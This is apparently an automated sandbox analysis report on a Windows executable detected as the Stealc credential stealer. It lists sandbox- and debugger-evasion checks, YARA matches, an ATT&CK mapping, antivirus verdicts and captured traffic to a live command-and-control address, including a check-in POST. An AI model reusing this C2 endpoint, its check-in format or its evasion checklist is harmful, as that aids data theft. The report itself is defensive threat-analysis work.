                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002ADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_002ABE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_002B3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002AF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002A16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A1160 GetSystemInfo,ExitProcess,0_2_002A1160
                Source: file.exe, file.exe, 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2223713103.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2223713103.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2223713103.0000000000D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2223713103.0000000000D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarev
                Source: file.exe, 00000000.00000002.2223713103.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~
                Source: file.exe, 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13648
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13651
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13671
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13703
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13663
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A45C0 VirtualProtect ?,00000004,00000100,000000000_2_002A45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002B9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9750 mov eax, dword ptr fs:[00000030h]0_2_002B9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_002B7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1524, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_002B9600
                Source: file.exe, file.exe, 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_002B7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_002B6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_002B7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_002B7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.2a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2223713103.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2182199807.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1524, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.2a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2223713103.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2182199807.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1524, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe47%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%Avira URL Cloudmalware
                http://185.215.113.37/e2b1563c6670f193.phpm100%Avira URL Cloudmalware
                http://185.215.113.37/6122658-3693405117-2476756634-1003100%Avira URL Cloudmalware
                http://185.215.113.37/ws100%Avira URL Cloudmalware
                http://185.215.113.37/e2b1563c6670f193.php100%Avira URL Cloudmalware
                http://185.215.113.37/3100%Avira URL Cloudmalware
                http://185.215.113.37100%Avira URL Cloudmalware
                http://185.215.113.37P0%Avira URL Cloudsafe
                http://185.215.113.37/e2b1563c6670f193.php14100%Avira URL Cloudmalware
                http://185.215.113.37/e2b1563c6670f193.php7100%Avira URL Cloudmalware
                http://185.215.113.37/e2b1563c6670f193.phpc100%Avira URL Cloudmalware
                http://185.215.113.37/e2b1563c6670f193.phpw100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • Avira URL Cloud: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpmfile.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://185.215.113.37/6122658-3693405117-2476756634-1003file.exe, 00000000.00000002.2223713103.0000000000D82000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://185.215.113.37Pfile.exe, 00000000.00000002.2223713103.0000000000D3E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://185.215.113.37file.exe, 00000000.00000002.2223713103.0000000000D3E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://185.215.113.37/3file.exe, 00000000.00000002.2223713103.0000000000D82000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://185.215.113.37/wsfile.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.php14file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpcfile.exe, 00000000.00000002.2223713103.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.php7file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpwfile.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.215.113.37
                		unknownPortugal
                		206894WHOLESALECONNECTIONSNLtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1520353
                Start date and time:2024-09-27 08:39:12 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 56s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:5
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 92
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: file.exe

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadeyBrowse
                • 185.215.113.16
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousAmadeyBrowse
                • 185.215.113.16
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                • 185.215.113.103
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousAmadeyBrowse
                • 185.215.113.16
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousAmadeyBrowse
                • 185.215.113.16
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.949560132686486
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'843'200 bytes
                MD5:db555e4fdc380e9e8a19fcc609f7d1aa
                SHA1:be66e90a5d5ce54f1a90bd59a3b4723e1a53d89c
                SHA256:c1cd69890f1f81efd491b94bfff2d9e1263f4a843fc42b649aac082cf378f3a8
                SHA512:6c48434a9457204b2beaf6cbb6a3668af343a42e82d289acdb6bdf8c05f53fa518ba0b150a5afe45426c19d81b7d0deab42d08228b1d20ead7b213335cdec8db
                SSDEEP:24576:roVmZMpcU+BEtUBGZZUbjoWlvFHvK84tnFHQIrUDnQo9zbnva6+9UsefY:rlmpZUBAWjoWxRvYtFwQRY+9Useg
                TLSH:4B8533837F1991F9DC784F731CEEE953A3921581961817B24A1BBBFA4E3218BD499CC0
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

                File Icon

                Icon Hash:00928e8e8686b000

                Static PE Info

                General

                Entrypoint:0xa99000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b

                Entrypoint Preview

                Instruction
                jmp 00007FBF78AB940Ah
                paddd mm3, qword ptr [ebx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add cl, ch
                add byte ptr [eax], ah
                add byte ptr [eax], al
                inc ecx
                push bx
                dec esi
                dec ebp
                das
                xor al, 36h
                dec edi
                bound ecx, dword ptr [ecx+4Ah]
                dec edx
                insd
                push edi
                dec eax
                dec eax
                jbe 00007FBF78AB9472h
                push esi
                dec edx
                popad
                je 00007FBF78AB946Bh
                push edx
                dec esi
                jc 00007FBF78AB947Ah
                cmp byte ptr [ebx], dh
                push edx
                jns 00007FBF78AB9447h
                or eax, 49674B0Ah
                cmp byte ptr [edi+43h], dl
                jnc 00007FBF78AB944Dh
                bound eax, dword ptr [ecx+30h]
                pop edx
                inc edi
                push esp
                push 43473163h
                aaa
                push edi
                dec esi
                xor ebp, dword ptr [ebx+59h]
                push edi
                push edx
                pop eax
                je 00007FBF78AB9457h
                xor dl, byte ptr [ebx+2Bh]
                popad
                jne 00007FBF78AB944Ch
                dec eax
                dec ebp
                jo 00007FBF78AB9443h
                xor dword ptr [edi], esi
                inc esp
                dec edx
                dec ebp
                jns 00007FBF78AB9450h
                insd
                jnc 00007FBF78AB9470h
                aaa
                inc esp
                inc ecx
                inc ebx
                xor dl, byte ptr [ecx+4Bh]
                inc edx
                inc esp
                bound esi, dword ptr [ebx]
                or eax, 63656B0Ah
                jno 00007FBF78AB9458h
                push edx
                insb
                js 00007FBF78AB9471h
                outsb
                inc ecx
                jno 00007FBF78AB9452h
                push ebp
                inc esi
                pop edx
                xor eax, dword ptr [ebx+36h]
                push eax
                aaa
                imul edx, dword ptr [ebx+58h], 4Eh
                aaa
                inc ebx
                jbe 00007FBF78AB944Ch
                dec ebx
                js 00007FBF78AB9443h
                jne 00007FBF78AB9431h
                push esp
                inc bp
                outsb
                inc edx
                popad
                dec ebx
                insd
                dec ebp
                inc edi
                xor dword ptr [ecx+36h], esp
                push 0000004Bh
                sub eax, dword ptr [ebp+33h]
                jp 00007FBF78AB945Ch
                dec edx
                xor bh, byte ptr [edx+56h]
                bound eax, dword ptr [edi+66h]
                jbe 00007FBF78AB943Ah
                dec eax
                or eax, 506C720Ah
                aaa
                xor dword ptr fs:[ebp+62h], ecx
                arpl word ptr [esi], si
                inc esp
                jo 00007FBF78AB9473h

                Rich Headers

                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                0x10000x25b0000x22800eae3c5b3d99fc278228f0942a3ae9954unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                0x25e0000x29e0000x20040dd42ee6ff97d4b3a317f9f7bd2c5b6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                fbyhctql0x4fc0000x19c0000x19be00e79e501c87e5c5dc44cfbc9f247b2c6aFalse0.9949639605462822data7.95281216056825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                dwaepsqc0x6980000x10000x4001eb0e82ce0abaee49ec08cc1672a1459False0.7822265625data6.128902526364697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant0x6990000x30000x220084d4efb7d1305e2a85c7a07a22434fbeFalse0.3968290441176471DOS executable (COM)4.178052787252471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                Imports

                DLLImport
                kernel32.dlllstrcpy

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-09-27T08:40:14.705683+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649711185.215.113.3780TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Sep 27, 2024 08:40:13.777677059 CEST4971180192.168.2.6185.215.113.37
                Sep 27, 2024 08:40:13.782623053 CEST8049711185.215.113.37192.168.2.6
                Sep 27, 2024 08:40:13.782707930 CEST4971180192.168.2.6185.215.113.37
                Sep 27, 2024 08:40:13.783364058 CEST4971180192.168.2.6185.215.113.37
                Sep 27, 2024 08:40:13.788244009 CEST8049711185.215.113.37192.168.2.6
                Sep 27, 2024 08:40:14.473900080 CEST8049711185.215.113.37192.168.2.6
                Sep 27, 2024 08:40:14.473967075 CEST4971180192.168.2.6185.215.113.37
                Sep 27, 2024 08:40:14.483140945 CEST4971180192.168.2.6185.215.113.37
                Sep 27, 2024 08:40:14.487984896 CEST8049711185.215.113.37192.168.2.6
                Sep 27, 2024 08:40:14.704139948 CEST8049711185.215.113.37192.168.2.6
                Sep 27, 2024 08:40:14.705682993 CEST4971180192.168.2.6185.215.113.37
                Sep 27, 2024 08:40:17.664391041 CEST4971180192.168.2.6185.215.113.37

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Sep 27, 2024 08:40:31.431972980 CEST53651561.1.1.1192.168.2.6

                HTTP Request Dependency Graph

                • 185.215.113.37

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.649711185.215.113.37801524C:\Users\user\Desktop\file.exe
                TimestampBytes transferredDirectionData
                Sep 27, 2024 08:40:13.783364058 CEST89OUTGET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Sep 27, 2024 08:40:14.473900080 CEST203INHTTP/1.1 200 OK
                Date: Fri, 27 Sep 2024 06:40:14 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Sep 27, 2024 08:40:14.483140945 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGI
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 43 39 34 30 34 33 46 36 39 30 31 39 34 32 37 37 39 37 33 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 2d 2d 0d 0a
                Data Ascii: ------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="hwid"66C94043F6901942779736------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="build"save------BFIIIDAFBFBKECBGDBGI--
                Sep 27, 2024 08:40:14.704139948 CEST210INHTTP/1.1 200 OK
